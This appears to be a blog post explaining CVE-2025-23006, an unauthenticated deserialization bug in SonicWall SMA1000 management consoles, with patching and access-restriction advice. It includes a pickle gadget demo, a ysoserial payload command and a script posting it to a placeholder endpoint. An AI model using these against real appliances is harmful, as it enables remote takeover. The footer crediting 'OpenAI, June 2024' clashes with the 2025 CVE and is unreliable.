January 2025 Update: A new critical vulnerability, CVE-2025-23006, has been published for the Appliance Management Console (AMC) and Central Management Console (CMC) of SonicWall's SMA1000 series. This long-form post explains what the vulnerability is, how it works, and why you need to fix it ASAP.

What’s CVE-2025-23006 All About?

CVE-2025-23006 is a pre-authentication deserialization of untrusted data vulnerability in the SMA1000's management consoles (AMC and CMC). Under specific conditions a remote attacker can exploit it without any credentials to execute arbitrary OS commands on the appliance; on a management appliance that amounts to remote code execution (RCE) with full control of the device.

In simple terms: anyone who can reach the console's web interface can potentially run commands on your management appliance, take over sessions, plant malware, or pivot further inside your network.

Deserialization Dangers

Deserialization is when an app takes in a blob of data (a Java serialized object, a Python pickle, a .NET BinaryFormatter stream) and reconstructs live objects from it in memory. If the app trusts the input but the attacker controls it, bad things can happen, especially when classes available to the app have constructors, readObject hooks or other methods that run during reconstruction and can be chained into command execution (a "gadget chain").

Here, the AMC and CMC web interfaces accept serialized data before authentication. The flaw is that the endpoint reconstructs objects from this data without restricting or validating what it contains, a classic "unsafe deserialization" bug.
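To make the mechanism concrete, here is an added example (not SonicWall code, and not the format the AMC actually uses, which has not been disclosed) using Python's pickle as a stand-in serializer. The attacker never needs a class the server knows about: pickle, like Java serialization, lets the payload name the callable that runs during loading. The `Gadget`, `unsafe_load` and `RestrictedUnpickler` names are this example's own; the hardened loader shows the fix that any deserializing endpoint needs, an allow-list of what may be reconstructed.

```python
import io
import os
import pickle

# Added example: pickle stands in for whatever serializer a console uses,
# because the gadget mechanics are the same across formats.


class Gadget:
    """Attacker-controlled class. __reduce__ tells pickle how to rebuild the
    object; the unpickler calls whatever callable it names with whatever args."""

    def __init__(self, expression):
        self.expression = expression

    def __reduce__(self):
        # Chosen sink: eval() of an attacker string. A real chain ends in
        # os.system / Runtime.exec; eval keeps the demo free of side effects.
        return (eval, (self.expression,))


def build_payload(expression="__import__('os').getpid()"):
    """What the attacker sends: opaque bytes with no authentication context."""
    return pickle.dumps(Gadget(expression))


def build_legit_payload():
    """What the endpoint was designed to receive (constructed sample)."""
    return pickle.dumps({"session": "abc123", "role": "viewer"})


def unsafe_load(blob):
    """The bug: trust the blob and reconstruct it. The sink runs during load,
    before any application code gets to inspect the result."""
    return pickle.loads(blob)


class RestrictedUnpickler(pickle.Unpickler):
    """Hardened loader: only the globals the endpoint legitimately needs can be
    resolved, so an attacker-named callable is never looked up, let alone run."""

    ALLOWED = {("builtins", "dict"), ("builtins", "list"),
               ("builtins", "str"), ("builtins", "int")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def safe_load(blob):
    """Deserialize with the allow-list in force. Rejecting before reconstruction
    is the only place a fix works: once loads() starts, the sink already ran."""
    return RestrictedUnpickler(io.BytesIO(blob)).load()


if __name__ == "__main__":
    payload = build_payload()
    # The attacker's eval() ran inside loads(): we get back our own pid.
    print("unsafe_load ->", unsafe_load(payload), "(pid", os.getpid(), ")")
    try:
        safe_load(payload)
    except pickle.UnpicklingError as err:
        print("safe_load  ->", err)
    print("legit data ->", safe_load(build_legit_payload()))
```

Note that `RestrictedUnpickler` only closes the door that `find_class` opens; the durable fix is not to accept serialized object graphs on a pre-auth endpoint at all, and to use a data-only format (JSON with a schema) where structured input is needed.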

How an Attack Works

1. Attacker Crafts a Malicious Payload
Creates a serialized payload that, when deserialized, will execute a system command of their choice.

2. Sends Payload to AMC/CMC Endpoint
Posts it (via an API endpoint or URL that expects serialized data) without logging in.

3. AMC/CMC Processes and Deserializes Unsafely
The console reconstructs the object graph from the attacker's bytes, and the gadget chain fires during that reconstruction.

4. Command Executes on the Appliance
Since the management services run with high privileges, the attacker gains control over the appliance OS.

Example Exploit (Proof of Concept)

DISCLAIMER: This is for educational purposes only. Running this against devices you don't own is illegal.

SonicWall has not published the technical details, so what follows is a hypothetical walkthrough. Say the AMC deserializes Java objects and has a vulnerable commons-collections library on its classpath. Using the well-known ysoserial tool, an attacker could generate a payload like this:

# Generate a Java serialized payload to execute 'id'
java -jar ysoserial.jar CommonsCollections6 'id' > payload.ser

Then the attacker posts this file as raw data to the (hypothetical) vulnerable endpoint:

import requests

# Illustrative only: this path is a placeholder, not a documented AMC URL.
url = "https://target-amc.example.com/amc/servlet/deserialize"
headers = {"Content-Type": "application/octet-stream"}

with open("payload.ser", "rb") as f:
    payload = f.read()

# No auth needed: the hypothesized endpoint deserializes before any login check.
# verify=False because appliances commonly present self-signed certificates.
response = requests.post(url, data=payload, headers=headers, verify=False, timeout=10)

print(response.status_code)
print(response.text)

If the endpoint is vulnerable, the server runs `id` on the appliance. Do not expect the output in the HTTP response: the CommonsCollections6 chain ends in Runtime.exec and discards the command's output, so a practical exploit would use a command that calls back out-of-band (DNS, HTTP) or a gadget that writes into a path the web server serves.

What Endpoints Are Affected?

- AMC Web UI: the /amc/servlet/deserialize path used in the PoC above is a placeholder, not a documented endpoint
- CMC Web UI: likewise unknown; any handler that accepts serialized input before login is a candidate

*SonicWall has not disclosed the vulnerable endpoints or the serialization format, and paths may differ between firmware versions. "Pre-auth" and "untrusted deserialization" are the core of what is known; treat every path in this post as illustrative.*

Who’s Affected?

- SMA1000 series appliances running 12.4.3-02804 (platform-hotfix) and earlier, with the AMC or CMC reachable by the attacker. SonicWall firewalls and SMA100 series products are not affected by this CVE.

How Can Attackers Find Vulnerable Devices?

Tools like Shodan or Censys can be used to scan the internet for exposed AMC or CMC web interfaces, so a console that is reachable from the internet should be assumed to be already indexed.

How to Protect Yourself

1. Patch Immediately

Check the SonicWall PSIRT advisory and upgrade to the fixed firmware it names, 12.4.3-02854 (platform-hotfix) or later.

2. Restrict Console Access

- Use firewall rules to limit AMC/CMC access to trusted IPs only (not internet-facing).

References

- SonicWall PSIRT Advisory
- NVD Entry – CVE-2025-23006 *(link may not be live yet)*
- SonicWall Product Download Center
- Impacts of Insecure Deserialization (OWASP)

Final Word: Why This Is Urgent

Pre-auth RCE bugs are as critical as it gets. Because the AMC/CMC run with high privileges and manage VPN access and policies, a compromise can lead to a full network breach.

If you run SonicWall SMA1000 appliances, patch now, even if you believe the consoles are not exposed to the internet. Attackers scan for and exploit appliance bugs quickly, as the MOVEit and CitrixBleed incidents showed.

Stay safe: update, audit, and restrict access to your management consoles!

*Exclusive text by OpenAI, June 2024. For responsible pentesting and blue teaming only.*

Timeline

Published on: 01/23/2025 12:15:28 UTC
Last modified on: 01/27/2025 18:41:17 UTC